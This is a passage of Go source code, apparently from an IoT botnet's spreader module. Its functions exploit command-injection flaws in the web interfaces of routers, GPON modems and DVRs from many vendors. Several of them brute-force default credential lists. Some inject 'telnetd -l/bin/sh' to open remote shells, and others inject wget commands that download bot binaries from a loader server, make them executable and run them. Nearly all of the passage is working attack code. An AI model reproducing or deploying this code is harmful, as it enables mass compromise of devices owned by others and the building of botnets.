    conn.Write([]byte("GET /menu_inter.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://" + target + "/login_inter.asp\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1612
    
1613
    for {
1614
        tmpbuf := make([]byte, 128)
1615
        ln, err := conn.Read(tmpbuf)
1616
        if ln <= 0 || err != nil {
1617
            break
1618
        }
1619

1620
        rdbuf = append(rdbuf, tmpbuf...)
1621
    
1622
        if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
1623
            authed = 1
1624
            break
1625
        }
1626
    }
1627

1628
    conn.Close()
1629

1630
    if fiberRandPort == 1 {
1631
        rand.Seed(time.Now().UnixNano())
1632
        telnetPort = rand.Intn(50000) + 10000
1633
    } else {
1634
        telnetPort = fiberStaticPort
1635
    }
1636

1637
    for i := 0; i < len(fiberSecStrs); i++ {
1638
        conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1639
        if err != nil {
1640
            return
1641
        }
1642

1643
        conn.Write([]byte("GET /goform/setPing?ping_ip=;telnetd%20-l/bin/sh%20-p" + strconv.Itoa(telnetPort) + "&requestNum=" + strconv.Itoa(i + 1) + "&diagtype=1&" + fiberSecStrs[i] + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\n\r\n"))
1644
        
1645
        tmpbuf := make([]byte, 128)
1646
        ln, err := conn.Read(tmpbuf)
1647
        if ln <= 0 || err != nil {
1648
            conn.Close()
1649
            break
1650
        }
1651

1652
        conn.Close()
1653

1654
        if !strings.Contains(string(rdbuf), "200 OK") {
1655
            return
1656
        }
1657
    }
1658

1659
    time.Sleep(3 * time.Second)
1660
    
1661
    ipslit := strings.Split(target, ":")
1662
    conn, err = net.DialTimeout("tcp", ipslit[0] + ":" + strconv.Itoa(telnetPort), 10 * time.Second)
1663
    if err == nil {
1664
        fmt.Printf("\x1b[38;5;46mFiberhome\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m telnet shell opened\x1b[38;5;15m\r\n", target)
1665
        go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderFiberhomeTag)
1666
        conn.Close()
1667
    }
1668

1669
    return
1670
}
1671

1672
func infectFunctionVigor(target string) {
1673

1674
    var rdbuf []byte = []byte("")
1675

1676
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1677
    if err != nil {
1678
        return
1679
    }
1680

1681
    payload := "action=login&keyPath=%27%0A%09%2F"
1682
    payload += vigorPayload
1683
    payload += "%27%0A%09%27&loginPwd=a&loginUser=a"
1684
    cntlen := strconv.Itoa(len(payload))
1685

1686
    conn.Write([]byte("POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n" + payload + "\r\n\r\n"))
1687
    
1688
    for {
1689
        tmpbuf := make([]byte, 128)
1690
        ln, err := conn.Read(tmpbuf)
1691
        if ln <= 0 || err != nil {
1692
            break
1693
        }
1694

1695
        rdbuf = append(rdbuf, tmpbuf...)
1696
        if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
1697
            fmt.Printf("\x1b[38;5;46mVigor\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1698
            payloadSent++
1699
            break
1700
        }
1701
    }
1702

1703
    conn.Close()
1704
}
1705

1706
func infectFunctionComtrend(target string) {
1707

1708
    var (
1709
        rdbuf []byte = []byte("")
1710
        state = 0
1711
        sessionKey = "null"
1712
    )
1713

1714
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1715
    if err != nil {
1716
        return
1717
    }
1718

1719
    conn.Write([]byte("GET /pingview.cmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/left.html\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1720
        
1721
    for {
1722
        tmpbuf := make([]byte, 128)
1723
        ln, err := conn.Read(tmpbuf)
1724
        if ln <= 0 || err != nil {
1725
            break
1726
        }
1727

1728
        rdbuf = append(rdbuf, tmpbuf...)
1729
        if strings.Contains(string(rdbuf), "&sessionKey=") && strings.Contains(string(rdbuf), "var code = 'location=") && state != 1 {
1730
            sessionKey = getStringInBetween(string(rdbuf), "   loc += '&sessionKey=", "';\n}\n\nvar code = 'location=\"' + loc + '\"';\n")
1731
            
1732
            if sessionKey == "null" {
1733
                break
1734
            }
1735

1736
            conn.Close()
1737
            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1738
            if err != nil {
1739
                return
1740
            }
1741

1742
            conn.Write([]byte("GET /ping.cgi?pingIpAddress=;cd%20/mnt;wget%20http://" + loaderDownloadServer + "/multi/wget.sh%20-O-%20>sfs;chmod%20777%20sfs;sh%20sfs%20" + loaderComtrendTag + ";&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/ping.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
1743
            state = 1
1744
        } else if state == 1 {
1745
            if strings.Contains(string(rdbuf), "function btnPing()") {
1746
                fmt.Printf("\x1b[38;5;46mComtrend\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1747
                payloadSent++
1748
                conn.Close()
1749
                return
1750
            }
1751
        }
1752
    }
1753

1754
    conn.Close()
1755
}
1756

1757
func infectFunctionGponFiber(target string) {
1758

1759
    var (
1760
        rdbuf []byte = []byte("")
1761
        logins []string = []string{"user:user", "adminisp:adminisp", "admin:stdONU101"}
1762
        stage = 0
1763
    )
1764

1765
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1766
    if err != nil {
1767
        return
1768
    }
1769

1770
    for i := 0; i < len(logins); i++ {
1771
        loginSplit := strings.Split(logins[i], ":")
1772

1773
        conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
1774
        if err != nil {
1775
            return
1776
        }
1777

1778
        cntlen := 14
1779
        cntlen = len(loginSplit[0])
1780
        cntlen = len(loginSplit[1])
1781

1782
        conn.Write([]byte("POST /boaform/admin/formLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + strconv.Itoa(cntlen) + "\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/admin/login.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nusername=" + loginSplit[0] + "&psd=" + loginSplit[1] + "\r\n\r\n"))
1783
        
1784
        for {
1785
            tmpbuf := make([]byte, 128)
1786
            ln, err := conn.Read(tmpbuf)
1787
            if ln <= 0 || err != nil {
1788
                break
1789
            }
1790

1791
            rdbuf = append(rdbuf, tmpbuf...)
1792
            if strings.Contains(string(rdbuf), "ERROR:bad password!") {
1793
                zeroByte(rdbuf)
1794
                break
1795
            } else if (strings.Contains(string(rdbuf), "HTTP/1.0 302 Moved Temporarily") || strings.Contains(string(rdbuf), "ERROR:you have logined!")) && stage != 1{
1796
                conn.Close()
1797
                conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
1798
                if err != nil {
1799
                    return
1800
                }
1801

1802
                payload := "target_addr=%3Brm%20-rf%20/var/tmp/stainfo%3Bwget%20http://" + loaderDownloadServer +  loaderBinsLocation + "bot.mips%20-O%20->/var/tmp/stainfo%3Bchmod%20777%20/var/tmp/stainfo%3B/var/tmp/stainfo%20" + loaderGponfiberTag + "&waninf=1_INTERNET_R_VID_"
1803
                cntlen := strconv.Itoa(len(payload))
1804

1805
                conn.Write([]byte("POST /boaform/admin/formTracert HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nConnection: close\r\nReferer: http://" + target + "/diag_tracert_admin_en.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
1806
                stage = 1
1807
                zeroByte(rdbuf)
1808
                continue
1809
            } else if stage == 1 {
1810
                if strings.Contains(string(rdbuf), "value=\"  OK  \"") {
1811
                    fmt.Printf("\x1b[38;5;46mGponFiber\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, loginSplit[0], loginSplit[1])
1812
                    conn.Close()
1813
                    payloadSent++
1814
                    return
1815
                }
1816
            }
1817
        }
1818

1819
        conn.Close()
1820
    }
1821

1822
    conn.Close()
1823
}
1824

1825
func infectFunctionBroadcomSessionKey(target string, auth string) string {
1826

1827
	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1828
	if err != nil {
1829
		return ""
1830
	}
1831

1832
	defer conn.Close()
1833
	conn.Write([]byte("GET /ping.html HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + auth + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/menu.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1834
	
1835
	for {
1836
		bytebuf := make([]byte, 256)
1837
		rdlen, err := conn.Read(bytebuf)
1838
		if err != nil || rdlen <= 0 {
1839
			return ""
1840
		}
1841
			
1842
		if strings.Contains(string(bytebuf), "pingHost.cmd") && strings.Contains(string(bytebuf), "&sessionKey=") {
1843
			index1 := strings.Index(string(bytebuf), "&sessionKey=")
1844
			index2 := strings.Index(string(bytebuf)[index1+len("&sessionKey="):], "';")
1845
			sessionKey := string(bytebuf)[index1+len("&sessionKey="):index1+len("&sessionKey=")+index2]
1846
			return sessionKey
1847
		}
1848
	}
1849

1850
	return ""
1851
}
1852

1853
func infectFunctionBroadcom(target string) {
1854

1855
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1856
    if err != nil {
1857
        return
1858
    }
1859

1860
    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1861

1862
	bytebuf := make([]byte, 64)
1863
	rdlen, err := conn.Read(bytebuf)
1864
	if err != nil || rdlen <= 0 {
1865
		conn.Close()
1866
		return
1867
	}
1868

1869
	conn.Close()
1870

1871
	if !strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok\r\nServer: micro_httpd") {
1872
		return
1873
	}
1874

1875
	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1876
	if err != nil {
1877
		return
1878
	}
1879

1880
	sessionKey := infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1881
	conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=" + broadcomPayload + "&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1882
	
1883
	bytebuf = make([]byte, 256)
1884
	rdlen, err = conn.Read(bytebuf)
1885
	if err != nil || rdlen <= 0 {
1886
		return
1887
	}
1888

1889
	conn.Close()
1890

1891
	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1892
	if err != nil {
1893
		return
1894
	}
1895

1896
	sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1897
	conn.Write([]byte("GET /pingHost.cmd?action=add&targetHostAddress=;ps|sh&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/ping.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1898

1899
	bytebuf = make([]byte, 256)
1900
	rdlen, err = conn.Read(bytebuf)
1901
	if err != nil || rdlen <= 0 {
1902
		return
1903
	}
1904

1905
	conn.Close()
1906

1907
	if !strings.Contains(string(bytebuf), "COMPLETED") {
1908
		fmt.Printf("\x1b[38;5;46mBroadcom\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, "support", "support")
1909
		return
1910
	}
1911

1912
	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1913
	if err != nil {
1914
		return
1915
	}
1916

1917
	sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
1918
	conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=time.nist.gov&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
1919
	
1920
	bytebuf = make([]byte, 256)
1921
	rdlen, err = conn.Read(bytebuf)
1922
	if err != nil || rdlen <= 0 {
1923
		return
1924
	}
1925

1926
	conn.Close()
1927
}
1928

1929
func infectFunctionHongdian(target string) {
1930

1931
    var (
1932
    	rdbuf []byte = []byte("")
1933
    	logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
1934
    )
1935
 
1936
    for i := 0; i < len(logins); i++ {
1937
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1938
    	if err != nil {
1939
        	return
1940
    	}
1941

1942
    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
1943
    	conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
1944

1945
        for {
1946
            tmpbuf := make([]byte, 128)
1947
            ln, err := conn.Read(tmpbuf)
1948
            if ln <= 0 || err != nil {
1949
                break
1950
            }
1951

1952
            rdbuf = append(rdbuf, tmpbuf...)
1953
            if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
1954
            	conn.Close()
1955

1956
            	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1957
		    	if err != nil {
1958
		        	return
1959
		    	}
1960

1961
		    	payload := "op_type=ping&destination=%3B"
1962
		    	payload += hongdianPayload
1963
		    	payload += "&user_options="
1964
		    	cntlen := strconv.Itoa(len(payload))
1965

1966
		    	conn.Write([]byte("POST /tools.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/tools.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
1967
		    	zeroByte(rdbuf)
1968

1969
		    	for {
1970
		            tmpbuf := make([]byte, 128)
1971
		            ln, err := conn.Read(tmpbuf)
1972
		            if ln <= 0 || err != nil {
1973
		                break
1974
		            }
1975

1976
		            rdbuf = append(rdbuf, tmpbuf...)
1977
		            if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") && strings.Contains(string(rdbuf), "/themes/oem.css") {
1978
		            	fmt.Printf("\x1b[38;5;46mHongdian\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
1979
		            	conn.Close()
1980
		            	payloadSent++
1981
		            	return
1982
		            }
1983
		        }
1984

1985
		        conn.Close()
1986
            	return
1987
            } else if strings.Contains(string(rdbuf), "HTTP/1.1 401 Unauthorized") {
1988
            	break
1989
            }
1990
        }
1991

1992
        zeroByte(rdbuf)
1993
        conn.Close()
1994
    }
1995
}
1996

1997
func infectFunctionRealtek(target string) {
1998

1999
    var (
2000
    	rdbuf []byte = []byte("")
2001
    	logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
2002
    )
2003
 
2004
    for i := 0; i < len(logins); i++ {
2005
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2006
    	if err != nil {
2007
        	return
2008
    	}
2009

2010
    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
2011
    	conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
2012

2013
        for {
2014
            tmpbuf := make([]byte, 128)
2015
            ln, err := conn.Read(tmpbuf)
2016
            if ln <= 0 || err != nil {
2017
                break
2018
            }
2019

2020
            rdbuf = append(rdbuf, tmpbuf...)
2021
            if strings.Contains(string(rdbuf), "HTTP/1.1 200") {
2022
            	conn.Close()
2023

2024
            	conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
2025
		    	if err != nil {
2026
		        	return
2027
		    	}
2028

2029
		    	payload := "submit-url=%2Fsyscmd.htm&sysCmd=ping&sysMagic=&sysCmdType=ping&checkNum=1&sysHost=%3Btelnetd%20-l/bin/sh%20-p31443&apply=Apply&msg=boa.conf%0D%0Amime.types%0D%0A"
2030
		    	cntlen := strconv.Itoa(len(payload))
2031

2032
		    	conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/syscmd.htm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
2033
				zeroByte(rdbuf)
2034

2035
		    	for {
2036
		            tmpbuf := make([]byte, 128)
2037
		            ln, err := conn.Read(tmpbuf)
2038
		            if ln <= 0 || err != nil {
2039
		                break
2040
		            }
2041

2042
		            rdbuf = append(rdbuf, tmpbuf...)
2043
		            if strings.Contains(string(rdbuf), "Redirect") && strings.Contains(string(rdbuf), "/syscmd.htm") {
2044
		            	time.Sleep(10 * time.Second)
2045

2046
        				ipslit := strings.Split(target, ":")
2047
        				tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":31443", 10 * time.Second)
2048
        				if err == nil {
2049
        					fmt.Printf("\x1b[38;5;46mRealtek\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
2050
        					tmpconn.Close()
2051
    					}
2052

2053
		            	conn.Close()
2054
		            	payloadSent++
2055
		            	return
2056
		            }
2057
		        }
2058

2059
		        conn.Close()
2060
            	return
2061
            } else if strings.Contains(string(rdbuf), "HTTP/1.1 401") {
2062
            	break
2063
            }
2064
        }
2065

2066
        zeroByte(rdbuf)
2067
        conn.Close()
2068
    }
2069
}
2070

2071
func infectFunctionTenda(target string) {
2072

2073
    var rdbuf []byte = []byte("")
2074

2075
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2076
    if err != nil {
2077
        return
2078
    }
2079

2080
    conn.Write([]byte("GET /goform/setUsbUnload/.js?deviceName=A;" + tendaPayload + " HTTP/1.1\r\nHost: " + target + "\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
2081

2082
    for {
2083
        tmpbuf := make([]byte, 128)
2084
        ln, err := conn.Read(tmpbuf)
2085
        if ln <= 0 || err != nil {
2086
            break
2087
        }
2088

2089
        rdbuf = append(rdbuf, tmpbuf...)
2090
        if strings.Contains(string(rdbuf), "HTTP/1.0 200 OK") && strings.Contains(string(rdbuf), "{\"errCode\":0}") {
2091
            fmt.Printf("\x1b[38;5;46mTenda\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2092
            payloadSent++
2093
            break
2094
        }
2095
    }
2096

2097
    conn.Close()
2098
}
2099

2100
func infectFunctionTotolink(target string) {
2101

2102
    var (
2103
    	rdbuf []byte = []byte("")
2104
    	logins []string = []string{"admin:admin", "admin:Soportehfc", "Soportehfc:Soportehfc", "admin:soportehfc", "soportehfc:soportehfc"}
2105
    )
2106
 
2107
    for i := 0; i < len(logins); i++ {
2108
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2109
    	if err != nil {
2110
        	return
2111
    	}
2112

2113
    	authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
2114
    	payload := "submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd="
2115
    	payload += totolinkPayload
2116
    	cntlen := strconv.Itoa(len(payload))
2117

2118
    	conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + authStr + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n" + payload + "\r\n\r\n"))
2119

2120
        for {
2121
            tmpbuf := make([]byte, 128)
2122
            ln, err := conn.Read(tmpbuf)
2123
            if ln <= 0 || err != nil {
2124
                break
2125
            }
2126

2127
            rdbuf = append(rdbuf, tmpbuf...)
2128
            if strings.Contains(string(rdbuf), "Location: http://" + target + "/syscmd.htm") {
2129
            	fmt.Printf("\x1b[38;5;46mTotolink\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
2130
            	payloadSent++
2131
            	break
2132
            }
2133
        }
2134

2135
        zeroByte(rdbuf)
2136
        conn.Close()
2137
    }
2138
}
2139

2140
func infectFunctionZyxel(target string) {
2141

2142
    var rdbuf []byte = []byte("")
2143
 
2144
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2145
    if err != nil {
2146
        return
2147
    }
2148

2149
    conn.Write([]byte("GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3B" + zyxelPayload + "+%23&password=asdf HTTP/1.1\r\nHost: " + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
2150
    
2151
    for {
2152
        tmpbuf := make([]byte, 128)
2153
        ln, err := conn.Read(tmpbuf)
2154
        if ln <= 0 || err != nil {
2155
            break
2156
        }
2157

2158
        rdbuf = append(rdbuf, tmpbuf...)
2159
        if strings.Contains(string(rdbuf), "errcode:5") {
2160
        	fmt.Printf("\x1b[38;5;46mZyxel\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2161
            payloadSent++
2162
            break
2163
        }
2164
    }
2165

2166
    zeroByte(rdbuf)
2167
    conn.Close()
2168
}
2169

2170
func infectFunctionAlcatel(target string) {
2171

2172
    var rdbuf []byte = []byte("")
2173
 
2174
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2175
    if err != nil {
2176
        return
2177
    }
2178

2179
    conn.Write([]byte("GET /cgi-bin/masterCGI?ping=nomip&user=;" + alcatelPayload + "; HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
2180
    
2181
    tmpbuf := make([]byte, 128)
2182
    ln, err := conn.Read(tmpbuf)
2183
    if ln <= 0 || err != nil {
2184
        conn.Close()
2185
    }
2186

2187
    zeroByte(rdbuf)
2188
    conn.Close()
2189
}
2190

2191
func infectFunctionLilinDvr(target string) {
2192

2193
	var authPos int = -1
2194
    var pathPos int = -1
2195
    var logins = [...]string{"root:icatch99", "report:8Jg0SR8K50", "report:report", "root:root", "admin:admin", "admin:123456", "admin:654321", "admin:1111", "admin:admin123", "admin:1234", "admin:12345"}
2196
    var paths = [...]string{"/dvr/cmd", "/cn/cmd"}
2197

2198
    for i := 0; i < len(logins); i++ {
2199
        logins[i] = base64.StdEncoding.EncodeToString([]byte(logins[i]))
2200
    }
2201
    
2202
    cntLen := 292
2203
    cntLen += len(lilinPayload)
2204
    cntLenString := strconv.Itoa(cntLen)
2205
    bytebuf := make([]byte, 512)
2206

2207
    for i := 0; i < len(logins); i++ {
2208

2209
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2210
        if err != nil {
2211
            break
2212
        }
2213

2214
        conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nAuthorization: Basic " + logins[i] + "\r\n\r\n"))
2215
		
2216
		bytebuf := make([]byte, 2048)
2217
        l, err := conn.Read(bytebuf)
2218
        if err != nil || l <= 0 {
2219
            zeroByte(bytebuf)
2220
            conn.Close()
2221
            return
2222
        }
2223

2224
        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2225
            authPos = i
2226
            zeroByte(bytebuf)
2227
            conn.Close()
2228
            break
2229
        } else {
2230
            zeroByte(bytebuf)
2231
            conn.Close()
2232
            continue
2233
        }
2234
    }
2235

2236
    if (authPos == -1) {
2237
        return
2238
    }
2239

2240
    for i := 0; i < len(paths); i++ {
2241

2242
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2243
        if err != nil {
2244
            break
2245
        }
2246

2247
       	conn.Write([]byte("POST " + paths[i] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: " + cntLenString + "\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov&" + lilinPayload + ";echo DONE\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
2248

2249
        bytebuf := make([]byte, 2048)
2250
        l, err := conn.Read(bytebuf)
2251
        if err != nil || l <= 0 {
2252
            zeroByte(bytebuf)
2253
            conn.Close()
2254
            continue
2255
        }
2256

2257
        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2258
            pathPos = i
2259
            zeroByte(bytebuf)
2260
            conn.Close()
2261
